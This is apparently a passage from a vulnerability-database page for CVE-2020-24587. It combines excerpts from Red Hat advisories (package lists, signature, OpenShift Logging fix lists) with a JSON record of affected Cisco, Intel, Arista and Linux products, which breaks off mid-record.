aarch64: bpftool-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm kernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-tools-libs-devel-4.18.0-348.el8.aarch64.rpm perf-debuginfo-4.18.0-348.el8.aarch64.rpm python3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm

ppc64le: bpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm kernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-tools-libs-devel-4.18.0-348.el8.ppc64le.rpm perf-debuginfo-4.18.0-348.el8.ppc64le.rpm python3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm

x86_64: bpftool-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm kernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-tools-libs-devel-4.18.0-348.el8.x86_64.rpm perf-debuginfo-4.18.0-348.el8.x86_64.rpm python3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBYYrdRdzjgjWX9erEAQhs0w//as9X4T+FCf3TAbcNIStxlOK6fbJoAlST FrgNJnRH3RmT+VxRSLWZcsJQf78kudeJWtMezbGSVREfhCMBCGhKZ7mvVp5P7J8l bobmdaap3hqkPqq66VuKxGuS+6j0rXXgGQH034yzoX+L/lx6KV9qdAnZZO+7kWcy SfX0GkLg0ARDMfsoUKwVmeUeNLhPlJ4ZH2rBdZ4FhjyEAG/5yL9JwU/VNReWHjhW HgarTuSnFR3vLQDKyjMIEEiBPOI162hS2j3Ba/A/1hJ70HOjloJnd0eWYGxSuIfC DRrzlacFNAzBPZsbRFi1plXrHh5LtNoBBWjl+xyb6jRsB8eXgS+WhzUhOXGUv01E lJTwFy5Kz71d+cAhRXgmz5gVgWuoNJw8AEImefWcy4n0EEK55vdFe0Sl7BfZiwpD Jhx97He6OurNnLrYyJJ0+TsU1L33794Ag2AJZnN1PLFUyrKKNlD1ZWtdsJg99klK dQteUTnnUhgDG5Tqulf0wX19BEkLd/O6CRyGueJcV4h4PFpSoWOh5Yy/BlokFzc8 zf14PjuVueIodaIUXtK+70Zmw7tg09Dx5Asyfuk5hWFPYv856nHlDn7PT724CU8v 1cp96h1IjLR6cF17NO2JCcbU0XZEW+aCkGkPcsY8DhBmaZqxUxXObvTD80Mm7EvN +PuV5cms0sE=2UUA -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Solution:

For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:

https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html

For Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:

https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html

  1. Bugs fixed (https://bugzilla.redhat.com/):

1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment

  1. JIRA issues fixed (https://issues.jboss.org/):

LOG-1168 - Disable hostname verification in syslog TLS settings LOG-1235 - Using HTTPS without a secret does not translate into the correct 'scheme' value in Fluentd LOG-1375 - ssl_ca_cert should be optional LOG-1378 - CLO should support sasl_plaintext(Password over http) LOG-1392 - In fluentd config, flush_interval can't be set with flush_mode=immediate LOG-1494 - Syslog output is serializing json incorrectly LOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server LOG-1575 - Rejected by Elasticsearch and unexpected json-parsing LOG-1735 - Regression introducing flush_at_shutdown LOG-1774 - The collector logs should be excluded in fluent.conf LOG-1776 - fluentd total_limit_size sets value beyond available space LOG-1822 - OpenShift Alerting Rules Style-Guide Compliance LOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled LOG-1862 - Unsupported kafka parameters when enabled Kafka SASL LOG-1903 - Fix the Display of ClusterLogging type in OLM LOG-1911 - CLF API changes to Opt-in to multiline error detection LOG-1918 - Alert FluentdNodeDown always firing LOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding

6

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202105-1432",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "catalyst 9115axe",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.10"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.12"
      },
      {
        "model": "catalyst 9105axi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr42e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "c-120",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "aironet 1842",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 1815",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex board 55",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst 9115axi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "mac80211",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "meraki mr72",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19"
      },
      {
        "model": "catalyst 9124",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 1800i",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex room 70 single",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.235"
      },
      {
        "model": "killer wi-fi 6e ax1675",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "meraki mr53e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex dx80",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst 9117",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4"
      },
      {
        "model": "catalyst 9120",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr74",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst 9120axp",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "1109-2p",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex room 55",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr34",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr62",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "proset wi-fi 6 ax201",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "aironet 3800i",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "c-230",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "meraki mr45",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "c-110",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "catalyst 9117 ap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr66",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9"
      },
      {
        "model": "meraki mx67cw",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mx67w",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr26",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ac 9560",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "catalyst iw6300 dc",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ir829gw-lte-ga-ek9",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst 9130axi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 1810",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ir829-2lte-ea-bk9",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 3800e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr56",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 1552",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr52",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 2800i",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 3800p",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "c-235",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "ir829gw-lte-ga-ck9",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst 9115",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 1572",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "w-118",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "aironet 1532",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 2702",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 3800",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst 9105axw",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst 9115 ap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ir829gw-lte-na-ak9",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.271"
      },
      {
        "model": "webex room kit mini",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst iw6300 dcw",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex dx70",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ir829gw-lte-vz-ak9",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 4800",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex room 55 dual",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "o-90",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "c-130",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "w-68",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "aironet 1542d",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 1832",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "c-100",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "proset ac 9560",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "c-75",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "meraki mr46e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr70",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 1810w",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mx65w",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "proset ac 8260",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "catalyst 9130axe",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "proset wi-fi 6e ax210",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "ip phone 8861",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 1852",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ac 8260",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "ir829-2lte-ea-ak9",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst 9120axi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki gr10",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr12",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr76",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "proset ac 8265",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "webex room 70 dual g2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ac 8265",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "aironet 1552h",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet iw3702",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex board 70",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 1702",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "c-260",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "catalyst 9120axe",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "802.11",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ieee",
        "version": "*"
      },
      {
        "model": "catalyst 9130 ap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "proset ac 3165",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.4"
      },
      {
        "model": "webex room 70",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 3702",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mx68w",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ip phone 8865",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 2800",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst 9130",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst 9120 ap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "1100-8p",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 2800e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ir829gw-lte-ga-zk9",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ip phone 8832",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr53",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.4.124"
      },
      {
        "model": "c-200",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "aironet 1815i",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr33",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex board 55s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst iw6300 ac",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "esw6300",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mx68cw",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "proset wireless 7265 \\",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "proset ac 9260",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "meraki z3c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14"
      },
      {
        "model": "ir829gw-lte-ga-sk9",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 1800",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr86",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex room kit",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catalyst 9105",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.12.9"
      },
      {
        "model": "proset ac 3168",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "meraki mr20",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki z3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "proset wi-fi 6 ax200",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "catalyst 9117axi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.271"
      },
      {
        "model": "ip phone 6861",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ac 9260",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "o-105",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "catalyst 9124axi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex room 70 single g2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr84",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki gr60",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex board 70s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "killer wi-fi 6 ax1650",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "meraki mr32",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "1100",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ip phone 8821",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "wi-fi 6 ax201",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "catalyst 9124axd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "c-65",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "meraki mr55",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "proset ac 9462",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.10.42"
      },
      {
        "model": "meraki mr30h",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "wi-fi 6 ax200",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "ir829-2lte-ea-ek9",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "killer ac 1550",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "proset ac 9461",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.193"
      },
      {
        "model": "1100-4p",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr42",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex board 85s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr46",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "c-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arista",
        "version": null
      },
      {
        "model": "catalyst iw6300",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr44",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mx64w",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "meraki mr36",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet ap803",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "1109-4p",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "1101-4p",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "aironet 1542i",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "webex room 70 dual",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "mac80211",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "802.11",
        "scope": null,
        "trust": 0.8,
        "vendor": "ieee",
        "version": null
      },
      {
        "model": "aterm",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u65e5\u672c\u96fb\u6c17",
        "version": null
      },
      {
        "model": "nec ai accelerator",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u65e5\u672c\u96fb\u6c17",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006876"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-24587"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:ieee:ieee_802.11:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:linux:mac80211:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-100_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
